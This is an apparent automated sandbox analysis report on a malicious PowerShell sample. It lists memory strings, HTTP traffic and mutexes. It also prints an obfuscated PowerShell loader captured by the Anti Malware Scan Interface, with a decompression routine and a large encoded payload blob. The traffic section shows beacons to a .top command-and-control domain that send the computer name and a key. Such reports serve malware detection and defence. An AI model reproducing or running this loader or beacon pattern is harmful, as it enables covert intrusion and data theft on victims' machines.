Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.13956791058.000002C22921C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.13986224582.000002C2435ED000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.13956791058.000002C2291A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.13986224582.000002C2435ED000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000001.00000002.13956791058.000002C2291A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx source: powershell.exe, 00000001.00000002.13986224582.000002C2435ED000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdllZ source: powershell.exe, 00000001.00000002.13986224582.000002C2435ED000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.13984621807.000002C243584000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOjJpGoCfSsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=T0Pqgds3nHwm8ebbeEHUuiB0uNK2zSwitbdpntpeAKOiI5COzyhi7P3byGfpGLKGpKoVtEikJT3Zm8oaDzdqlqWdzZ5w6T9o8s0Jtzlp_4MVkxwwER1m5ClZzXb9A1U0G_eItjYOUenHFJMqpcQ9a4qLFign6zWk2hUHkDgS4K-riA52XjiJ0DBtRot8lxS8nhvI |
Source: global traffic | HTTP traffic detected: GET /cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOjJpGoCfSsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=T0Pqgds3nHwm8ebbeEHUuiB0uNK2zSwitbdpntpeAKOiI5COzyhi7P3byGfpGLKGpKoVtEikJT3Zm8oaDzdqlqWdzZ5w6T9o8s0Jtzlp_4MVkxwwER1m5ClZzXb9A1U0G_eItjYOUenHFJMqpcQ9a4qLFign6zWk2hUHkDgS4K-riA52XjiJ0DBtRot8lxS8nhvI |
Source: global traffic | HTTP traffic detected: GET /cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOjJpGoCfSsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=T0Pqgds3nHwm8ebbeEHUuiB0uNK2zSwitbdpntpeAKOiI5COzyhi7P3byGfpGLKGpKoVtEikJT3Zm8oaDzdqlqWdzZ5w6T9o8s0Jtzlp_4MVkxwwER1m5ClZzXb9A1U0G_eItjYOUenHFJMqpcQ9a4qLFign6zWk2hUHkDgS4K-riA52XjiJ0DBtRot8lxS8nhvI |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22C032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22C1D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22C0A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$p8kelzf597r40a3/$96btka1fyg04lxe.php? |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22C032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22BEB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$p8kelzf597r40a3/$96btka1fyg04lxe.php?id=$env:computername&key=$achreisqzudt&s=527 |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22C26F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$p8kelzf597r40a3/$96btka1fyg04lxe.php?id=$env:computername&key=$achreisqzudt&s=5P |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22BE8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22C26F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22C26F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527 |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22C26F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527p |
Source: powershell.exe, 00000001.00000002.13983130147.000002C2431B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000001.00000002.13983130147.000002C2431DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000001.00000002.13986500324.000002C2438F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000001.00000002.13984621807.000002C243551000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.t.com/pki/crl/pr |
Source: powershell.exe, 00000001.00000002.13973978050.000002C23B19A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13973978050.000002C23B057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzjR |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22AFE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000001.00000002.13984621807.000002C243551000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wsoft.com/pki/ceroCerAut_2010-06- |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzjR |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BE8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22C0A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BEB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOj |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BE8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9 |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22AFE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.13973978050.000002C23B057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.13973978050.000002C23B057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.13973978050.000002C23B057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BE8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22B42C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzjR |
Source: powershell.exe, 00000001.00000002.13973978050.000002C23B19A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13973978050.000002C23B057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.13957717613.000002C22BEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.13957717613.000002C22BE8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $d8v21egmsqjyi9c.(([char[]]@((-8087+8154),(-2886+2997),(-1082+(-8403+9597)),(-1414+1535),(10201-10117),(1517-(8229318/5853))) -join ''))( $idwn1to5eayf0x8 ) $d8v21egmsqjyi9c.(([system.String]::new(@((-2923+2990),(177984/(7395-5747)),(783771/7061),(8450-8335),(-3569+3670)))))()$qaropg34581d29x.((-join (@((-760+827),(3856-(2474+1274)),(-884+995),(-8521+8636),(131300/1300))| ForEach-Object { [char]$_ })))()[byte[]] $hieyxgbcfn054k7 = $idwn1to5eayf0x8.(([char[]]@((-9748+9832),(-2971+(-725+3807)),(181090/2786),(-6790+(3419+(-4963+8448))),(5731-5617),(940-843),(641905/5305)) -join ''))() $d69y275nvlbohwt=$hieyxgbcfn054k7 return $d69y275nvlbohwt}[System.Text.Encoding]::ascii.(([char[]]@((-2670+2741),(6260-(16342-10183)),(803416/(9509398/1373)),(6404-(12243-5922)),(623500/(54728250/(72068196/(12035-4957)))),(168-(300078/(8002-(-7593+10038)))),(752115/7163),(-2791+(8789-(3465+2423))),(-7987+(1160+(6376+(1587-(899+(80668/602))))))) -join ''))((fwz2edi9pkcr7nvjy3htoamguxq "J+d/MGpiemFnecboYQNraRjn5UwjhsqjmAvdrPmowU5OcXUT1J3kV2qV+X55dOherUjBGDgv7/e9h9DMK1s8Et/W3tAYXK4R3qEvfvZxaxiYrwaIw4imyY+V3YY8hpuH+adQl8V9l66N5Ics14PICPY/JL3cxVOfZ3OZrlYYAJuRiKS8p/HKiBWckL+VRp30wVPozY+Qk9J0/pamD+uk8+GFwVq4jsQGX5eaza3FLb4djrbsj7dje8Iboxd0o9fe/btO5P4Uwbz8z7XkBhfgCzWVlgtLMhjKyrErkpkxM1+L4r3ZpzbYvQUI9l+UHHAu8sHhhE698U91gRv6cyQmJ4rMsxK4qQgekdYS2xEvxJnTfbS01Qf6uWE2vWTbMkemdd0hrQxsR5oKohaYS52+24lTwVEMAub+60nMV4dPtbp/C/TFgflN98qtlBf4gOy4i+e6L5Xq+6f0IgdiciPSHct2AfN/6xh43h3FdaLPz6SY6ZNdz7Yqa9ohvW1OHrbeQQLKPVPVU5Irg8jthI9tyvVc+gDoIgECgip7naa6QgTt9Fap/A+iZkxcnxcF+FKF/L1kD/YRY1aqBbYhsNYN3wSM11hYaKx9pMQUlQeOw0WEsqnSXaCqn/HdJD+egoKO/5+oj5UDBZ7TgA4QeZyq+ZUOBLqO1y63Xjc90lPw5EJbJoZTEbtBlbjBg7qURQYOSkmFMBLvaaQ1/7gxEB+C8YHhfqyHJLqgrqwUJnWHsOGWAzRxbt68QcFrYUv18d23DTE/+QbxmH3Tqds18+FPGzO8WwnJZTtC/bjP0lrVWccTx+6HpCZ7zMY0gRSdoYptlqWO+zgAzdFCIeExgTTn0TJ8V1XhfIRc8T72O9F2CEUr6qXtxN46RrrqpZkMXJkx7XUZNr2MjMyE1qV9z3MYf2Q1VZfYJgWswssoXoyPHL+cwbIdXyNb/6/nwELPJK5yHQvu5xs/pdiU5Tb9axnhrNG/Ffo8N5uU7ZKbyeVdxRkT4YUCofw93hbcG16BG6LCA0Lf1OOm7eMnH2a+P5HHNkRGNecjz2lxAdbOZgVbCBaQhL6NzKWq/QV9Q5SquriA35d4rskbxnJgntuzHm+0XrMMMzakeHFSOcKziLET4D3rGxnYRrpKVa1tpNPHva5wJoerEWxw5aZpQbhi/cXmK2rxCVKCJKfxyxrsrSExlCV3pqMFNi86zHFbFEBpO2zp3uTOlo45pNwIYZVKAfCIwICOm4iQZoQeNeiIy4O74AX4dumcy/PpL5wtlR0QwVHIQJiq5zU9lj5qBAm4CUPXrIjvwvpYSc3chU+oJ7awPZPaQWo9fM4g8vkfPgNOrORXydQCwjIh2oEBExI6+MyWI4q85g4VYOvr8zjwu46Y6ir7M0JQ7YCJ0D9PQ2nFWny3dgdVVjXQ2NBvHUP2KE7YuEuyI |